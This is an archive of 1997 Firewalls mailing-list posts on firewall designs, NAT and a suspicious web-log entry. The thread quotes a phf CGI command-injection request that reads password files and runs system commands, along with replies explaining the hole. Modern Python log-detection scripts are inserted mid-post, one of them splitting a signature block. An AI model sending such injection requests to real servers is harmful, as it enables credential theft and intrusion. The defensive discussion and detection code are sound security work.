>mailto:psalgueiro@pt.europe.dg.com
>
>R. Dr. António Loureiro Borges nº2
>Arquiparque - Miraflores
>1495 Algés
>Portugal
>______________________________________________
>"Don't take life too serious no one gets out alive!!!! :-)"
>
>* These are my own opinions and do not reflect those of the company *
>
>----------
>From: Mike Jones
>Sent: Wednesday, 4 June 1997 8:55
>To: mfiocchi@otm.it; firewalls@GreatCircle.COM; carlsonp@sprynet.com
>Subject: Re: PIX and Firewall-1
>
>Peter Carlson writes....
>> There are many comparisons made by datacomm, lan times, ziff-davis and
>> others. Keep in mind that both pix and fw-1 are glorified packet filters,
>> even though they have a fancy name for it. I would stick with an
>> application level gateway. They are well accepted and known for being more
>> secure.
>
>Many things are known that aren't so. This claim comes by periodically
>in this forum, and I have yet to get an answer to this question: in
>what way are application level gateways more secure than, say, FW-1 or PIX?
>There are certainly capabilities that can be provided via application
>proxies that can't be provided by any filter-based technologies, but what
>types of attacks are a FW-1 or a PIX vulnerable to that application
>proxies aren't?
>--
> Mike Jones
> Sr. Technology Advisor
> UNIFIED Technologies
>
>

From owner-firewalls-outgoing Wed Jun 4 09:15:35 1997
From: "Mariko Yashada"
Date: Wed, 04 Jun 97 12:01:18 PDT
To: "Firewalls Mailing List"
Subject: Re: ISP Connection

Thank you for all your comments.

Last fall our plan was to connect to the Internet through MCI.
We security people said fine, but you will need a firewall for any connections between the Internet and the Enterprise Network. So we did an evaluation of firewalls and settled on two we felt best suited our needs. The firewall added enough cost to the project that it was postponed. It has now been revived using our ISP for the connection with the hope the ISP can some way offer the security. I see now we should follow our original plan and put up a firewall at our end.

Here is a related question: There is another local ISP who will connect us at T1 and install a firewall at our location. They will then administer the firewall remotely from their location. They support three different firewalls, Gauntlet, Firewall-1 and Borderware. The advantage is the savings in admin costs. Has anyone had any experience with this type of arrangement? We have also talked to BBN about their Site Patrol product, which is a remotely managed Gauntlet.

Thanks,
Mariko

From owner-firewalls-outgoing Wed Jun 4 10:00:50 1997
From: ArkanoiD
Date: Wed, 4 Jun 1997 19:01:12 +0400 (MSD)
To: mhorn@funb.com (Mark Horn [ Net Ops ])
Cc: mjr@clark.net, Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship
nuqneH,

> This works. I have it in use on a couple of different production
> firewalls. It's certainly not a great solution, but it works without
> having to make kernel modifications. The problem with this, though, is
> that it doesn't scale well. There are two reasons:
>
> a) You have to have a unique IP address on the client side of the
>    firewall for every server on the server side. This won't
>    work well if your firewall connects to the Internet where
>    there are a *LOT* of servers.
>
> b) The number of configuration lines to set this up is a multiple
>    of the number of clients, servers, directions and ports.
>    So if you have 50 clients, 2 servers, 1 port, and
>    connections need to be initiated in both directions,
>    you'll need 50 * 2 * 2 * 1 = 200 config lines.
>
> Even if it doesn't scale well, it works and it's not hard to do.
>
> (*) I have read the TIS license agreement and I am *NOT* going to
>     distribute a patch. The license agreement grants me the license
>     to modify the TIS source code for my own organization's use. I'm
>     not a lawyer. I don't know if that means I can't legally
>     distribute patches, but it sure sounds like it.
>

Hmm, hey TIS people, is it true? If yes - can you allow him to distribute the patch?

--
 _     _  _ _ _ _ _ _ _    {::}  {::}  {::}      CU in Hell
 _| o |_ | | _|| | / _||_| |_ |_ |_ (##)  (##)  (##)     /Arkan#iD
|_  o  _||_| _||_| / _| | o |_||_||_| [||]  [||]  [||]  Do i believe in Bible? Hell,man,i've seen one!
From owner-firewalls-outgoing Wed Jun 4 10:01:38 1997
From: Stan Wnuck
Date: Wed, 4 Jun 97 12:04:34 EDT
To: Firewalls@GreatCircle.COM
Subject: getting passwd file via WWW

Hi all,

I have noticed on my WWW log files the following 2 entries.

    some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
    some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143

Does anyone know anything about these cgi scripts or programs? Or how dangerous this is? I changed the real source location to a fake some.remote.location.edu to not let out the bag of the source of this hack, since I am not sure what my next move would be.

Thanks in advance.

Stan Wnuck                                 swnuck@unixpros.com
Unixpros, Inc.
10 Industrial Way East                     (908) 389-3295 x542
Eatontown, NJ 07724                        (908) 389-5461 Fax
PM-CHS Technology Insertion Office
Ft.
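Added example, not from Stan's post: detection logic for the two patterns in his log, run over constructed access-log lines of the same shape. phf built a shell command line out of its query parameters, and an encoded newline (%0A) ended the intended command so whatever followed ran as a second one; php.cgi was probed with a bare file path. The checks below flag requests to those CGI names, decoded newlines or shell metacharacters in a query, references to sensitive files, and use the HTTP status to tell a probe that hit nothing (404) from one the server actually executed (200). Sample lines use RFC 5737 addresses.

```python
"""Flag phf-style CGI injection attempts in Common Log Format access logs.

Added example, not from the post. SAMPLE_ACCESS_LOG is constructed; the first
two lines mirror the two quoted above, the rest are benign traffic.
"""
import re
from typing import Any, Dict, List, Optional
from urllib.parse import unquote

SAMPLE_ACCESS_LOG = """\
203.0.113.7 - - [28/Apr/1997:01:33:21 +0000] "GET /cgi-bin/phf?Qalias=x%0Acat%20/etc/passwd HTTP/1.0" 200 140
203.0.113.7 - - [28/Apr/1997:01:33:23 +0000] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
198.51.100.2 - - [28/Apr/1997:02:10:05 +0000] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 312
198.51.100.9 - - [28/Apr/1997:02:11:40 +0000] "GET /index.html HTTP/1.0" 200 2048
"""

CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<target>\S+)(?: (?P<proto>[^"]+))?" (?P<status>\d{3}) (?P<size>\S+)'
)

# CGI programs with well-known 1990s input-handling flaws; these two are the ones in the post.
RISKY_CGI = {"phf", "php.cgi"}
SHELL_META = re.compile(r"[;|`$&]")
SENSITIVE_PATHS = ("/etc/passwd", "/etc/shadow")


def parse_clf(line: str) -> Optional[Dict[str, Any]]:
    """Split one Common Log Format line into fields; None if the line does not parse."""
    m = CLF_RE.match(line)
    if m is None:
        return None
    rec: Dict[str, Any] = m.groupdict()
    rec["status"] = int(rec["status"])
    return rec


def analyse_request(target: str) -> List[str]:
    """Human-readable findings for one request target (path plus query string)."""
    path, _, query = target.partition("?")
    name = path.rsplit("/", 1)[-1]
    decoded = unquote(query)  # %0A becomes a real newline, %20 a space, and so on
    findings: List[str] = []
    if name in RISKY_CGI:
        findings.append(f"request to known-vulnerable CGI {name}")
    if "\n" in decoded or "\r" in decoded:
        findings.append("encoded newline in query (the phf command-injection pattern)")
    elif SHELL_META.search(decoded):
        findings.append("shell metacharacter in decoded query")
    for sensitive in SENSITIVE_PATHS:
        if sensitive in decoded:
            findings.append(f"reference to {sensitive}")
    return findings


def triage(log: str) -> List[Dict[str, Any]]:
    """Every parsed request with at least one finding, in log order."""
    hits: List[Dict[str, Any]] = []
    for line in log.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        findings = analyse_request(rec["target"])
        if not findings:
            continue
        rec["findings"] = findings
        # A 200 on an injection attempt means the server ran the CGI with that input;
        # a 404 (the php.cgi line in the post) means the program was not even there.
        rec["likely_succeeded"] = rec["status"] == 200 and any("newline" in f for f in findings)
        hits.append(rec)
    return hits
```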
Monmouth Army Base, NJ                     (908) 427-2033 / 427-6963

From owner-firewalls-outgoing Wed Jun 4 10:39:09 1997
From: Rabid Wombat
Date: Wed, 4 Jun 1997 11:28:25 -0400 (EDT)
To: Jyri Kaljundi
Cc: Firewalls@GreatCircle.COM
Subject: Re: Security Crazy

On Sun, 1 Jun 1997, Jyri Kaljundi wrote:
>
> Sat, 31 May 1997, Marcus J. Ranum wrote:
>
> >> my CEO has gone security crazy [...] win95
> >
> > He's a bit unclear on the concept, isn't he?
>
> I am pretty sure there actually are good commercial systems available to
> make a large number of win95 machines much more secure than they are
> out-of-box.

All things are relative ...

From owner-firewalls-outgoing Wed Jun 4 11:00:43 1997
From: Jose Luis Delgado
Date: Wed, 4 Jun 1997 12:58:27 -0500 (CDT)
To: firewalls@GreatCircle.Com
Subject: Secure Telnet!
> Ssh (Secure Shell) is a program to log into another computer over a
> network, to execute commands in a remote machine, and to move files
> from one machine to another. It provides strong authentication and
> secure communications over insecure channels.
>

Hi to everyone!

Does anybody know where I can find shareware/freeware SECURE telnet for NT???

Thanks in advance!

From owner-firewalls-outgoing Wed Jun 4 11:49:32 1997
From: "Daniel J Blander - Sr. Systems Engineer for ACS"
Date: Wed, 4 Jun 1997 09:13:09 -0700
To: Pedro Salgueiro
Cc: "'Mike Jones'", "'firewalls'"
Subject: RE: PIX and Firewall-1 (Thesis Length)

I disagree and agree (in that order)....

On Wed, 4 Jun 1997, Pedro Salgueiro wrote:

> I've been "watching" the discussion regarding the differences between
> packet-filtering and application level firewalls. I believe that there
> are some:
> 1 - Packet filtering firewalls are more difficult to manage
> (It is very simple to mis-configure => less secure).
> It may be very complicated establishing rules.

Most firewalls are "difficult" to configure. One is not necessarily more difficult to configure than another. Even application level firewalls ask you to list valid hosts, networks, etc - so misconfiguration can be just as difficult.
The focus should be on the tools used to configure the rules. If they are lacking and poor, like anything else, it will be hard to configure.

> 2 - Packet filter systems are always routing packets
> (so "fail-open" may occur). A well known constructor firewall crashed
> with a ping attack and routed all the packets from the insecure
> network to the secure one.

Unfortunately the conclusion that you draw from this example is not quite accurate. Yes, packet filtering systems and stateful-inspection firewalls do route packets (and *yes* Virginia, they are two different types of firewalls) but that does not necessarily mean that "fail-open" occurs. I can list at least one vendor where the failure of the firewall causes packets *not* to be routed (good old systems that allow ip-forwarding to be turned off and then the firewall, while up, forwards the packets itself - failure of the firewall means forwarding has also failed since the underlying system will so - sorry, I won't do it).

> 3 - If you are using a packet filter system and you provide SMTP,
> HTTP, etc. you cannot control what the users do with those
> protocols, i.e., you open or close a port. Application level
> firewalls provide secure daemons of those protocols.

Here is where I agree 100%. You can not, with a packet filter or pure stateful-inspection firewall, filter what people do over those ports. The best firewalls out there are those that are not really out there yet. They are hybrids of stateful-inspection and application level firewalls. Stateful inspection allows me to filter and manage even UDP connections (good old NTP for example which I have customers who *must* have it) but I need application level firewalls to control the garbage being stuffed over http these days, or to protect the smtp port.... I like stateful-inspection firewalls because they watch the high-ports for me and close them when a FIN is sent for a specific communications and log any probes on these ports.
There are benefits to both technologies: stateful-inspection and application gateways. I will admit pure, old style ACL packet filtering is insecure and limited in its usefulness if used alone, but only because certain protocols have unusual requirements (FTP in Active mode) and that someone figured out how to send RST packets to still open high ports and other fun and games with the IP protocols. The advance of the exploits to a given technology requires new tools to counter them. Old style ACL packet filtering was good when it first hit because it was all we thought we needed. Then someone figured out how to spoof packets and work around on high ports. Now we have countered that with application level firewalls which control even the content but are limited in what types of protocols can go through (which is a good thing and a bad thing). Stateful Inspection firewalls came along and said, let's have it somewhere in the middle (ok, closer to packet filtering firewalls but with communications state built in). There will be exploits found in both of these technologies as well - between mis-configuration, TCP sequence attacks, man-in-the-middle attacks, etc, there are enough hacks out there that say the real issues are beginning to reach beyond whether you are using packet filtering, stateful inspection or application level firewalls, and beg for a new style of firewall - a new technology....

(And, No I don't think that it is Abir-Net.....;-)

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Daniel Blander =8^)
Sr.
Systems Engineer
Applied Computer Solutions
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Phone: (714) 842.7800    Fax: (714) 842.8299
Email: Daniel.Blander@acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
http://www.acsacs.com
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From owner-firewalls-outgoing Wed Jun 4 11:54:30 1997
From: Oliver Friedrichs
Date: Wed, 4 Jun 1997 10:49:59 -0600 (MDT)
To: firewalls@greatcircle.com
Subject: [SNI-14]: Solaris rpcbind vulnerability

We have just released a security advisory which affects individuals filtering rpcbind under Solaris 2.x platforms. The advisory is available at http://www.secnet.com/advisories/sni-14.solaris.rpcbind.advisory.html

- Oliver

- - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - - -
Secure Networks Incorporated.
Calgary, Alberta, Canada, (403) 262-9211

From owner-firewalls-outgoing Wed Jun 4 12:10:55 1997
From: Geoff Mulligan
Date: Wed, 04 Jun 1997 11:02:42 -0600
To: Anton J Aylward
Cc: "Mark Horn [ Net Ops ]", Firewalls@GreatCircle.COM
Subject: Re: Plug-gw- One to many relationship

anton@the-wire.com said:
> One public address, and a 10.x.x.x of internal addresses and web
> servers. POW! The address space problem just went away.

Just get a box that does Network address translation and POW you have a class A on one side and a couple of addresses on the other. That's what I have, not that I really need a class A for my dozen or so machines.
geoff

From owner-firewalls-outgoing Wed Jun 4 12:49:43 1997
From: "Sameer R. Manek"
Date: Wed, 4 Jun 1997 10:14:45 -0700 (PDT)
To: firewalls@greatcircle.com
Subject: firewall setup

The other day someone drew an ASCII map of how the network should be set up. It looked something like this:

    ---> gateway -+-> firewall ---> internal net
                  |
                  mail server

In this setup I don't really seem to understand the purpose of the gateway. Here, my intro to TCP/IP protocols book defines a gateway as a device that translates between protocols. The book suggests it would translate between one network protocol to another, i.e. tcp/ip -> ipx or appletalk for example. I suppose a gateway could also do NAT and IP masquerading, but assuming you aren't doing any form of NAT, what is the purpose of a gateway? Wouldn't a packet filtering router do a better job with greater security? Also is NAT more desirable, from a security standpoint?

--
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
Sameer Manek                      manek@challenger.atc.fhda.edu
Commercial Zen: See the dew, do the dew, be the bunny, avoid the Noid.
-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-

From owner-firewalls-outgoing Wed Jun 4 14:47:47 1997
From: minaba@dns1.ci.chi.il.us (Mark Inaba)
Date: Wed, 4 Jun 1997 15:36:09 -0500 (CDT)
To: Firewalls@GreatCircle.COM
Subject: audio/video streams

Does anyone have any horror stories (or just warnings) about letting video/audio streams through a firewall? I don't recall seeing anything recently, but I've been blurring through things.
Thanks
-Mark

From owner-firewalls-outgoing Wed Jun 4 14:54:43 1997
From: zzIML Firewalls
Date: Wed, 4 Jun 1997 10:24:29 -0700
To: "'Firewalls@GreatCircle.COM'"
Subject: Do people host WWW servers behind firewalls?

This has been an ongoing planning debate for us... does the potential latency and overhead of a firewall potentially point toward putting high-access high-performance WWW servers on the net without a firewall? Is there a true trade-off of "security vs. performance"?

Presume that the WWW servers are at a co-location ISP site and don't have any "critical data" on them. They are mostly publish sites...

What is the norm for large sites, say 10MB connected sites or DS3 (45MB) connected sites... Are large public WWW servers typically "behind a firewall" or are they in the clear? Yahoo, Microsoft, Netscape, etc? I mean the large sites... 1,000,000 hits a day sites? What about 10,000,000 hits a day?

If there is a discussion in the archives that might be of use, let me know...
Thank you, Stephen Gutknecht mailto:StephenG@vnw.com From owner-firewalls-outgoing Wed Jun 4 15:19:56 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id JAA11333 for firewalls-outgoing; Wed, 4 Jun 1997 09:50:24 -0700 (PDT) Received: from smartwall.v-one.com (smartwall.v-one.com [206.205.89.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id JAA11304 for ; Wed, 4 Jun 1997 09:50:06 -0700 (PDT) Received: by smartwall.v-one.com; id MAA20117; Wed, 4 Jun 1997 12:53:48 -0400 (EDT) Received: from nt-fs1.v-one.com(198.69.135.3) by smartwall.v-one.com via smap (V3.1.1) id xma020114; Wed, 4 Jun 97 12:53:37 -0400 Received: by nt-fs1.V-ONE.COM with Internet Mail Service (5.0.1457.3) id ; Wed, 4 Jun 1997 13:01:00 -0400 Message-ID: From: "McMahan, Peg" To: firewalls@GreatCircle.COM Subject: Checkpoint Firewall-1: VPN and Remote Administration Date: Wed, 4 Jun 1997 13:00:59 -0400 X-Priority: 3 MIME-Version: 1.0 X-Mailer: Internet Mail Service (5.0.1457.3) Content-Type: text/plain Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am wondering about the remote management capabilities of the Checkpoint Firewall-1? If an admin is responsible for admining several firewalls in different locations, is remote administration possible? If so, is it relatively simple in setup, and how secure is it? Are the communications strongly authenticated? How about encrypted? Also, with the product SecuRemote, does that software replace the client PC's TCP Stack? Margaret H. McMahan V-ONE Corporation 1803 Research Blvd, Suite 305 Rockville MD, 20850 (301)838-8900 . 
224 From owner-firewalls-outgoing Wed Jun 4 15:39:22 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA00315 for firewalls-outgoing; Wed, 4 Jun 1997 14:09:49 -0700 (PDT) Received: from ibmmail.COM (ibmmail.com [204.146.168.193]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA00215 for ; Wed, 4 Jun 1997 14:09:25 -0700 (PDT) From: uskanbye@ibmmail.com Message-Id: <199706042109.OAA00215@honor.greatcircle.com> Received: from ibmmail by ibmmail.COM (IBM VM SMTP V2R3) with BSMTP id 4764; Wed, 04 Jun 97 17:13:14 EDT Date: Wed, 04 Jun 1997 17:13:11 EDT To: firewalls@GreatCircle.COM X-Sender-Info: Mitchell Ummel CSP CCP EMAIL:mummel@kdhe.state.ks.us Office of Information Systems, Tech Services Section MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Subject: Eagle Raptor NT 4.0 and "Local Tunnel" Config Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Anybody out there using the local (null) tunnel feature in the Eagle NT 4.0 firewall? We're attempting to configure this, in conjunction with filters, to pass some protocols that can't be GSP'd (Data Link Switching/DLSw). Any advice/comments/suggestions welcomed. Thanks! 
--------KANSAS DEPARTMENT OF HEALTH & ENVIRONMENT--------- ---------------WWW.STATE.KS.US/PUBLIC/KDHE---------------- --------------Landon State Office Building---------------- ------------------Phone (913) 296-5643-------------------- From owner-firewalls-outgoing Wed Jun 4 15:54:10 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA29437 for firewalls-outgoing; Wed, 4 Jun 1997 14:05:27 -0700 (PDT) Received: from mail.marben.com (losgatos.sjc.marben.com [206.86.34.51]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id OAA29127 for ; Wed, 4 Jun 1997 14:04:29 -0700 (PDT) Received: (from girsch@localhost) by mail.marben.com (SMI-8.6/SMI-SVR4/MPI-AG(12)) id OAA27744 ; Wed, 4 Jun 1997 14:08:15 -0700 From: girsch@marben.com (Arnaud Girsch) Message-Id: <199706042108.OAA27744@mail.marben.com> Subject: Re: getting passwd file via WWW To: swnuck@unixpros.com (Stan Wnuck) Date: Wed, 4 Jun 1997 14:08:14 -0700 (PDT) Cc: Firewalls@GreatCircle.COM In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> from "Stan Wnuck" at Jun 4, 97 12:04:34 pm X-Organization: Marben Products, Inc. / DSET Corporation X-Mailer: ELM [version 2.4 PL24] MIME-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > I have noticed on my WWW log files the following 2 entries. > > some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140 > some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143 > > > Does anyone know anything about these cgi scripts or programs? > Or how dangerous this is? These are well known cgi scripts containing security holes. 
The phf script coming with the default NCSA server is buggy, and should be disabled. (It allows execution of shell programs.)

Arnaud.
--
Arnaud Girsch -+- Marben Products, Inc. / DSET Corporation - San Jose, CA
agirsch@marben.com -+- http://www.marben.com/ -+- http://www.dset.com/

From owner-firewalls-outgoing Wed Jun 4 16:17:32 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA20587 for firewalls-outgoing; Wed, 4 Jun 1997 10:40:37 -0700 (PDT) Received: from greta.teleport.com (sandra.teleport.com [192.108.254.11]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA20574 for ; Wed, 4 Jun 1997 10:40:24 -0700 (PDT) Received: from linda.teleport.com (linda.teleport.com [192.108.254.12]) by greta.teleport.com (8.8.5/8.7.3) with ESMTP id KAA27110; Wed, 4 Jun 1997 10:44:03 -0700 (PDT) Received: (from alano@localhost) by linda.teleport.com (8.8.5/8.8.4) id KAA19593; Wed, 4 Jun 1997 10:44:03 -0700 (PDT) Date: Wed, 4 Jun 1997 10:44:03 -0700 (PDT) From: Alan To: Stan Wnuck cc: Firewalls@GreatCircle.COM Subject: Re: getting passwd file via WWW In-Reply-To: <199706041601.JAA03033@honor.greatcircle.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

On Wed, 4 Jun 1997, Stan Wnuck wrote:
> Hi all,
>
> I have noticed on my WWW log files the following 2 entries.
>
> some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
> some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
>
>
> Does anyone know anything about these cgi scripts or programs?
> Or how dangerous this is?

You have just been hacked. Get rid of the phf script. It has a major security hole.
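[Editor's note: the following detection script is an added example and is not part of Alan's or Arnaud's replies, nor anyone else's code in this thread. It parses Common Log Format lines, decodes the query string of hits on /cgi-bin/phf and lists the shell commands smuggled in after each encoded newline (%0A), which is how phf was abused: the decoded field value reached a shell, and a newline started a new command. SAMPLE_LOG is constructed from the two entries Stan quoted plus one benign request from a made-up client 10.0.0.5; the WATCHED_CGI names are the two programs named in the log.]

```python
"""Flag phf-style CGI command injection in NCSA/Apache Common Log Format lines.

Editorial example added to this archive; not code from anyone in the thread.
SAMPLE_LOG is constructed from the two quoted entries plus one benign hit.
"""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

# Constructed sample: the two quoted entries and one normal page hit.
SAMPLE_LOG = """\
some.remote.location.edu - - [28/Apr/1997:01:33:21 +0015] "GET /cgi-bin/phf?Jserver=ns.uiuc.edu%0Acat%20/etc/passwd%0Aypcat%20passwd%0Apwd%0Aid%0Auname%20-a%0A&Qalias=&Qname=foo&Qemail=&Qnickname=&Qoffice_phone=&Qcallsign=&Qproxy=&Qhigh_school=&Qslip= HTTP/1.0" 200 140
some.remote.location.edu - - [28/Apr/1997:01:33:23 -74587788] "GET /cgi-bin/php.cgi?/etc/passwd" 404 143
10.0.0.5 - - [28/Apr/1997:01:35:00 +0000] "GET /index.html HTTP/1.0" 200 2048
"""

# Common Log Format: host ident authuser [date] "request" status bytes
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] "(?P<request>[^"]*)" '
    r'(?P<status>\d{3}) (?P<bytes>\S+)$'
)

# CGI programs named in the thread as leaking files or running commands.
WATCHED_CGI = ("/cgi-bin/phf", "/cgi-bin/php.cgi")


def parse_clf(line):
    """Split one CLF line into fields; return None if it is not CLF."""
    m = CLF_RE.match(line.rstrip("\r\n"))
    if not m:
        return None
    rec = m.groupdict()
    parts = rec["request"].split(" ")
    rec["method"] = parts[0]
    rec["target"] = parts[1] if len(parts) > 1 else ""
    return rec


def injected_commands(target):
    """Return the shell commands hidden after %0A in any phf query field.

    parse_qsl percent-decodes (and turns '+' into space) the way the CGI
    did, so each literal newline in a decoded value marks a new command.
    The text before the first newline is the legitimate field value.
    """
    cmds = []
    for _field, value in parse_qsl(urlsplit(target).query, keep_blank_values=True):
        cmds.extend(c.strip() for c in value.split("\n")[1:] if c.strip())
    return cmds


def scan(log_text):
    """Return one finding per hit on a watched CGI, with decoded detail."""
    findings = []
    for line in log_text.splitlines():
        rec = parse_clf(line)
        if rec is None:
            continue
        url = urlsplit(rec["target"])
        if url.path not in WATCHED_CGI:
            continue
        findings.append({
            "host": rec["host"],
            "cgi": url.path,
            "status": int(rec["status"]),
            # A 200 with commands present means the server ran them.
            "commands": injected_commands(rec["target"]) if url.path == "/cgi-bin/phf" else [],
            "query": unquote(url.query),
        })
    return findings


if __name__ == "__main__":
    for f in scan(SAMPLE_LOG):
        print(f"{f['host']} -> {f['cgi']} HTTP {f['status']} query={f['query']!r}")
        for c in f["commands"]:
            print("    injected command:", c)
```

Run over the quoted entries, the phf hit decodes to the command list cat /etc/passwd, ypcat passwd, pwd, id, uname -a with a 200 status, which is the reading both replies give (the server ran them); the 404 on php.cgi shows the same source probing a second CGI with a file path as its query.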
(You may want to upgrade your server to something more recent as well, as there are other holes to worry about.)

Change all passwords. They have your password file and are probably running crack on it as you read this.

alano@teleport.com | "Those who are without history are doomed to retype it."

From owner-firewalls-outgoing Wed Jun 4 16:18:03 1997
Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id LAA28285 for firewalls-outgoing; Wed, 4 Jun 1997 11:21:09 -0700 (PDT) Received: from firewall2.Lehman.COM (firewall.Lehman.COM [192.147.65.67]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id LAA28224 for ; Wed, 4 Jun 1997 11:20:48 -0700 (PDT) From: carson@lehman.com Received: (from smap@localhost) by firewall2.Lehman.COM (8.8.5/8.6.12) id OAA27225; Wed, 4 Jun 1997 14:24:08 -0400 (EDT) Received: from unknown(146.127.39.20) by firewall2 via smap (V1.3) id tmp027213; Wed Jun 4 14:24:05 1997 Received: from kublai.lehman.com by relay.lehman.com (4.1/LB-0.6) id AA27503; Wed, 4 Jun 97 14:24:04 EDT Received: from dragon.lehman.com by kublai.lehman.com (4.1/Lehman Bros. V1.6) id AA17599; Wed, 4 Jun 97 14:24:03 EDT Received: by dragon.lehman.com (SMI-8.6/Lehman Bros. V1.5) id OAA19517; Wed, 4 Jun 1997 14:24:02 -0400 Date: Wed, 4 Jun 1997 14:24:02 -0400 Message-Id: <199706041824.OAA19517@dragon.lehman.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Content-Transfer-Encoding: 7bit To: Anton J Aylward Cc: "Mark Horn [ Net Ops ]" , Firewalls@GreatCircle.COM Subject: Re: Plug-gw- One to many relationship In-Reply-To: <3.0.32.19970604114909.00952700@the-wire.com> References: <3.0.32.19970604114909.00952700@the-wire.com> X-Mailer: VM 6.27 under 20.1 XEmacs Lucid (beta8) Reply-To: carson@lehman.com Sender: firewalls-owner@GreatCircle.COM Precedence: bulk

>>>>> "Anton" == Anton J Aylward writes:
Anton> Now that's what *I* call a one to many mapping. You come up with a
Anton> good way to do this and you'll be famous.
Anton> One public address, and a 10.x.x.x of internal addresses and web Anton> servers. POW! The address space problem just went away. It's called NAT (or NAPT) and is part of ip-filter. There are even diffs for making the fwtk app proxies work with it. Next question? -- -- Carson Gaspar -- carson@cs.columbia.edu carson@lehman.com http://www.cs.columbia.edu/~carson/home.html From owner-firewalls-outgoing Wed Jun 4 16:30:51 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id QAA18512 for firewalls-outgoing; Wed, 4 Jun 1997 16:14:33 -0700 (PDT) Received: from grab (grab.coslabs.com [199.233.92.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with SMTP id QAA18503 for ; Wed, 4 Jun 1997 16:14:27 -0700 (PDT) Received: from future.mulligan.com by grab (SMI-8.6/SMI-SVR4) id RAA02814; Wed, 4 Jun 1997 17:18:14 -0600 Received: from future by future.mulligan.com (SMI-8.6/SMI-SVR4) id RAA05256; Wed, 4 Jun 1997 17:18:06 -0600 Message-Id: <199706042318.RAA05256@future.mulligan.com> X-Mailer: exmh version 2.0gamma 1/27/96 To: zzIML Firewalls cc: "'Firewalls@GreatCircle.COM'" Subject: Re: Do people host WWW servers behind firewalls? In-reply-to: Your message of "Wed, 04 Jun 1997 10:24:29 PDT." <103BEF1175D2D011B83400A0C903EE964331@hurricane.vnw.com> Mime-Version: 1.0 Content-Type: text/plain; charset=us-ascii Date: Wed, 04 Jun 1997 17:18:06 -0600 From: Geoff Mulligan Sender: firewalls-owner@GreatCircle.COM Precedence: bulk I am pretty sure that the pathfinder site is behind a firewall. Using something like a stateful packet screen rather than a proxy relay for the firewall will introduce little latency and provide the added protection. 
